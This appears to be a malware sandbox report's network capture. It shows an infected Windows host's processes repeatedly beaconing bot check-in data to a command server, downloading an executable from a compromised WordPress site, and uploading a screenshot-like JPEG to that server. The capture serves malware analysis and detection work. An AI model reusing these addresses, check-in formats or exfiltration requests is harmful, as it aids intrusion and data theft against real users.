                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          195192.168.2.449863176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:42.098555088 CEST6386OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          196176.111.174.11480192.168.2.449860C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:42.165818930 CEST6406INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          197176.111.174.11480192.168.2.449863C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:42.203804970 CEST6418INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          198192.168.2.449864176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:42.403166056 CEST6419OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          199176.111.174.11480192.168.2.449864C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:42.499996901 CEST6420INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          2192.168.2.44974489.184.92.21080C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:58:52.372241020 CEST4021OUTGET /wp-content/themes/cinestar/extendvc/xsrv2.exe HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: ukedocumentary.com
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          20192.168.2.449758176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:12.426002026 CEST4531OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          200192.168.2.449866176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:42.712897062 CEST6420OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          201176.111.174.11480192.168.2.449866C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:42.821469069 CEST6421INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          202192.168.2.449867176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:43.036272049 CEST6422OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          203176.111.174.11480192.168.2.449867C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:43.137773991 CEST6451INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:43 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          204192.168.2.449868176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:43.346451044 CEST6459OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          205176.111.174.11480192.168.2.449868C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:43.448180914 CEST6460INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:43 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          206192.168.2.449870176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:43.661226988 CEST6460OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          207176.111.174.11480192.168.2.449870C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:43.765486956 CEST6461INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:43 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          208192.168.2.449871176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:43.978337049 CEST6461OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          209176.111.174.11480192.168.2.449871C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:44.082300901 CEST6462INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          21176.111.174.11480192.168.2.449758C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:12.529751062 CEST4531INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          210192.168.2.449872176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:44.282030106 CEST6462OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          211176.111.174.11480192.168.2.449872C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:44.382854939 CEST6463INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          212192.168.2.449873176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:44.596575975 CEST6463OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          213176.111.174.11480192.168.2.449873C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:44.695749044 CEST6464INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          214192.168.2.449874176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:44.905251980 CEST6465OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          215192.168.2.449875176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:44.929976940 CEST6478OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
